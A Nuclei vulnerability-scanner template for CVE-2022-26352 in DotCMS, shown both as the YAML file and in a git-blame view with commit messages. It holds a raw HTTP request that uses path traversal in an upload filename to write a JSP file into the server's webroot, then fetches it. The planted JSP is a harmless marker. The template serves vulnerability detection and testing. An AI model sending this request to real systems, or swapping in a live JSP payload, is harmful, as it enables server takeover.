nuclei-templates/cves/2022/CVE-2022-26352.yaml

id: CVE-2022-26352

info:
  name: DotCMS Arbitrary File Upload
  author: h1ei1
  severity: critical
  description: There is an arbitrary file upload vulnerability in the /api/content/ path of the DotCMS management system, and attackers can upload malicious Trojans to obtain server permissions.
  reference:
    - https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/
    - https://github.com/h1ei1/POC/tree/main/CVE-2022-26352
  classification:
    cve-id: CVE-2022-26352
  tags: cve,cve2022,rce,dotcms

requests:
  - raw:
      - |
        POST /api/content/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3

        --------------------------aadc326f7ae3eac3
        Content-Disposition: form-data; name="name"; filename="../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp"
        Content-Type: text/plain

        <%
        out.println("CVE-2022-26352");
        %>
        --------------------------aadc326f7ae3eac3--

      - |
        GET /{{randstr}}.jsp HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "CVE-2022-26352")'
          - 'status_code_2 == 200'
        condition: and
Add CVE-2022-26352 (#4302) * Create CVE-2021-22054.yaml * Update CVE-2021-22054.yaml * Update CVE-2021-22054.yaml * misc updates * Add CVE-2022-26352 * Update CVE-2022-26352.yaml * Update CVE-2022-26352.yaml * Update CVE-2022-26352.yaml * Update CVE-2022-26352.yaml * Update CVE-2022-26352.yaml * updated with harmless minimal poc Co-authored-by: xiaoheihei1107 <62200676+xiaoheihei1107@users.noreply.github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-05-05 16:40:02 +00:00			`id: CVE-2022-26352`

			`info:`
			`name: DotCMS Arbitrary File Upload`
			`author: h1ei1`
			`severity: critical`
			`description: There is an arbitrary file upload vulnerability in the /api/content/ path of the DotCMS management system, and attackers can upload malicious Trojans to obtain server permissions.`
			`reference:`
			`- https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/`
			`- https://github.com/h1ei1/POC/tree/main/CVE-2022-26352`
Add classification->cve-id 2022-05-09 18:51:52 +00:00			`classification:`
			`cve-id: CVE-2022-26352`
Add CVE-2022-26352 (#4302) * Create CVE-2021-22054.yaml * Update CVE-2021-22054.yaml * Update CVE-2021-22054.yaml * misc updates * Add CVE-2022-26352 * Update CVE-2022-26352.yaml * Update CVE-2022-26352.yaml * Update CVE-2022-26352.yaml * Update CVE-2022-26352.yaml * Update CVE-2022-26352.yaml * updated with harmless minimal poc Co-authored-by: xiaoheihei1107 <62200676+xiaoheihei1107@users.noreply.github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-05-05 16:40:02 +00:00			`tags: cve,cve2022,rce,dotcms`

			`requests:`
			`- raw:`
			`- \|`
			`POST /api/content/ HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3`

			`--------------------------aadc326f7ae3eac3`
			`Content-Disposition: form-data; name="name"; filename="../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp"`
			`Content-Type: text/plain`

			`<%`
			`out.println("CVE-2022-26352");`
			`%>`
			`--------------------------aadc326f7ae3eac3--`

			`- \|`
			`GET /{{randstr}}.jsp HTTP/1.1`
			`Host: {{Hostname}}`

			`req-condition: true`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'contains(body_2, "CVE-2022-26352")'`
			`- 'status_code_2 == 200'`
Add classification->cve-id 2022-05-09 18:51:52 +00:00			`condition: and`